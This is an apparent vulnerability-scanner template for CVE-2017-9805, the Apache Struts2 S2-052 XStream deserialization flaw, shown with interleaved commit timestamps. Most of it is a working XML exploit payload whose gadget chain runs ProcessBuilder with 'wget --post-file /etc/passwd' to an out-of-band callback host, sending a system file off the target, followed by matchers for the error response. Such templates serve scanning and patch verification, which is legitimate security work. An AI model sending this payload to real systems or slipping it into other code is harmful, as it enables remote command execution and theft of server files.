2021-02-21 14:01:07 +00:00
id : CVE-2017-9805
info :
2022-04-21 21:16:41 +00:00
name : Apache Struts2 S2-052 - Remote Code Execution
2021-02-21 14:01:07 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2022-04-21 21:16:41 +00:00
description : The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.
2021-08-18 11:37:49 +00:00
reference :
2021-04-18 13:00:27 +00:00
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
- https://struts.apache.org/docs/s2-052.html
2022-04-21 21:16:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-9805
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-9805
cwe-id : CWE-502
2022-07-21 17:18:22 +00:00
tags : cve,cve2017,apache,rce,struts,kev
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2021-02-21 14:01:07 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-21 14:01:07 +00:00
- method : POST
path :
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
2021-02-23 01:42:08 +00:00
- "{{BaseURL}}/orders/3"
2021-02-21 14:01:07 +00:00
headers :
Content-Type : application/xml
body : |
2021-08-19 14:44:46 +00:00
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>--post-file</string>
<string>/etc/passwd</string>
2022-03-21 20:17:31 +00:00
<string>{{interactsh-url}}</string>
2021-08-19 14:44:46 +00:00
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>asdasd</name>
</filter>
<next class="string">asdasd</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
2021-02-21 14:01:07 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "Debugging information"
- "com.thoughtworks.xstream.converters.collections.MapConverter"
condition : and
- type : status
status :
- 500
2022-02-04 15:15:15 +00:00
2022-04-21 21:16:41 +00:00
# Enhanced by mp on 2022/04/20